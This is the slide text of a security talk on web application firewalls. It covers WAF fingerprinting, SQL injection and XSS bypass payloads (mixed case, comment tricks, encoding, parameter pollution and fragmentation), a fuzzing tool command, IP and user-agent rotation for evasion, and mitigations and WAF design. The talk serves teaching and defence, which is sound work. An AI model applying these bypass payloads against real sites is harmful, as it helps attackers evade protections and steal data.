WAF protections and bypass resources
0 likes253 views
The document details the design and implementation of a custom web application firewall (WAF) aimed at modern cyber threats, emphasizing various attack vectors and mitigation techniques. It covers topics such as common attacks on WAFs, bypass methods, fuzzing, and the creation of a WAF using different technologies and libraries. The author, a seasoned cybersecurity engineer, also provides links to open-source projects and emphasizes the importance of validation and hardening in security practices.
![Buffer Overflow
●
When WAF service don’t have a proper validation in inputs, you can
see this problem in fuzzing tests...
●
Look this following:
●
/cars/id/page/=-25+and+(select
2)=(Select0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A...])+/*!UnIOn*/+/*!selECt*/+4,5,6,7…
●
id=2 and (select 2)=(Select 0xAAAAAAAAAAAAAAAAAAAAA...)
+uNIoN+seLecT+2,3,version()...](https://image.slidesharecdn.com/wafpresentermb-210320223409/85/WAF-protections-and-bypass-resources-14-320.jpg)
WAF protections and bypass resources
- 1. Custom Web application firewall for modern world
- 2. Whoamy ● Antonio Costa aka Cooler_ ● Projects: Github.com/CoolerVoid ● Contact: [email protected] ● Cyber security engineer ● Programmer/developer ● 13 years of work experience with pentest, codereview, development, incident detection, incident response and hardening.
- 3. Simple case
- 5. Request rules ● Full Match ● Blocklist ● Rank based ● Regex ● DFA ● AI ● ML
- 6. Other resources for rules ● Block per IP adress ● Leak mitigation(responses) ● Insert anti-csrf tokens ● Detect UserAgent anomaly ● Strong blocklist ● Denial of service ● Force hardening in custom endpoints Headers HSTS, anti-xss, CSP, nosniff… ● Insert cookie attributes, httponly Secure...
- 7. Practical point view ● Detection the type of WAF ● Common attacks in WAF ● Custom attacks to bypass WAF ● Attack Mitigation in WAF ● Attack Mitigation in application ● Create your custom WAF ● My OpenSource Projects ● Attack and Protection!
- 8. Detection You can search a pattern in cookie, header response… Each WAF have a different context in response. ● https://svn.nmap.org/nmap/scripts/http-waf-detect.nse ● https://github.com/sandrogauci/wafw00f ● http://code.google.com/p/imperva-detect/
- 9. Common attacks ● WAFs can be configured to actively block requests and traffic that violate the WAF rule-sets. This is a useful feature, but needs to be used judiciously, an WAF that is in over-active blocking mode prevents legitimate traffic from reaching the Web server, making the application unusable. ● Sometimes have a weak rules, that don’t match attacks to block.
- 10. Mixed case ● Cool trick to bypass a common rule is mixed case, here the big purpose is bypass absence of case sensitive rules. ● SELECT, SeLect, selEcT… UnIOn, unIoN... ● Look this following: ● /sell/cars.php?search=<script>alert(document.cookie)</script> ● /sell/cars.php?search=<SCripT>AlErt(DoCuMenT.cOoKie)</scrIpt>
- 11. Replace Keywords ● Replace Keywords is common function in WAFs, this resource erase critical points in attacks, but you can bypass this, you need a point to insert attack word between payload. ● Look this following: ● /cars_show.php?car_id=-30 UNIunionON SELselectECT 6,7,8,9 ● /cars_show.php?car_id=-30 UNION SELECT 6,7,8,9
- 12. Spaces to comment ● Replace points to comments is very good way to bypass WAF. ● Look this following: ● /sell/cars.php?search=id=1+UnIoN/*&a=*/SeLeCT/*&a=*/ 1,2,3,database()– - ● /sell/cars.php?search=id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*! ● table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– -
- 13. Encode abuse ● Other trick to bypass, is the abuse of encode, sometimes application can render encoded strings... ● Look this following: <script>alert(document.cookie)</script> ● Url encode: %3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E ● 64 encode: PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ=
- 14. Buffer Overflow ● When WAF service don’t have a proper validation in inputs, you can see this problem in fuzzing tests... ● Look this following: ● /cars/id/page/=-25+and+(select 2)=(Select0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA A...])+/*!UnIOn*/+/*!selECt*/+4,5,6,7… ● id=2 and (select 2)=(Select 0xAAAAAAAAAAAAAAAAAAAAA...) +uNIoN+seLecT+2,3,version()...
- 15. HTTP Parameter Pollution(HPP) The following request doesn’t allow anyone to conduct an attack: ● /?id=1;select+4,5,6+from+users+where+id=1-- ● This request will be successfully performed using HPP. ● /?id=1;select+4&id=5,6+from+users+where+id=1-- ● Successful conduction of an HPP attack bypassing WAF depends on the environment of the application being attacked
- 16. Using HTTP Parameter Fragmentation (HPF) execute_query("select * from table where a=".input_a." and b=".input_b); execute_query("select * from table where a=".input_a." and b=".input_b." limit ".input_c); ● The following request doesn’t allow anyone to conduct an attack ● /?a=1+union+select+1,2/* These requests is a possible attack using HPF ● /?a=1+union/*&b=*/select+1,2 /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users-- • The SQL requests become ● select * from table where a=1 union/* and b=*/select 1,2 select * from table where a=1 union/* and b=*/select 1,pass/*limit */from users--
- 17. Time machine ● Random delay each request ● Random UserAgent per request ● Random IP address per request(Proxy) ● Bypass Intrusion prevention system (IPS) Web application firewall (WAF)
- 18. Automate ● Project to change your list of payloads using a lot techniques to help bypass a WAF. ● https://github.com/CoolerVoid/payloadmask
- 19. Fuzzing / Brute ● 0d1n is a tool for automating customized attacks against web applications. ● Open Source ● Use thread pool ● Github.com/CoolerVoid/0d1n
- 20. Fuzzing / Brute
- 21. Fuzzing / Brute ● 0d1n –host http://localhost/test.php –post ”car_name_search=ˆ ” –payloads payloads/xss.txt –find_regex_list payloads/guess.txt –log name_log –save_response –tamper urlencode -proxy-rand payloads/proxy.txt
- 22. Fuzzing / Brute
- 23. Application mitigations ● Validation and proper sanitization(remove DOM, js, HTML…). ● Prepared Statements (with Parameterized Queries). ● Create a function that check a Block list with common words in attacks (eval,timeout,union,--, select, delete, version, benchmark, sleep, /**/...), set all string to lower case before scan pattern. ● Study your ORM(SQLalchemy, Hibernate...) to prevent pitfalls in resources. ● Follow Mitre and OWASP tricks to hardening etc...
- 24. Create your WAF
- 25. Create your WAF ● Study five years around sockets and raw sockets ● Demultiplexer problems (select(), epoll(), kqueue(), pthreads(), MPI…) ● Race conditions ● Testing a lot list of libraries libuv(used by node) libevent(old lib for core of nginx) Python Twisted
- 26. Create your WAF ● WAF from the scratch RaptorWAF ● Demultiplexer use select() with pthreads ● Have a problem, race conditions in millions connections(lock with mutex cannot save). ● Easy to understand ● Github.com/CoolerVoid/RaptorWAF
- 27. Create your WAF ● Pthread tests ● Libevent study ● Lighthttpd core study ● The big travel...
- 28. Create your WAF ● OctopusWAF ● Uses LibEvent ● Have support to heavy connections ● Uses lib Injection to detect SQLi ● Github.com/CoolerVoid/OctopusWAF
- 29. Create your WAF
- 30. Detections
- 31. Detections ● Machine learning ● Natural language ● IA ● Score based ● Uploads (binary checks)
- 32. Questions ?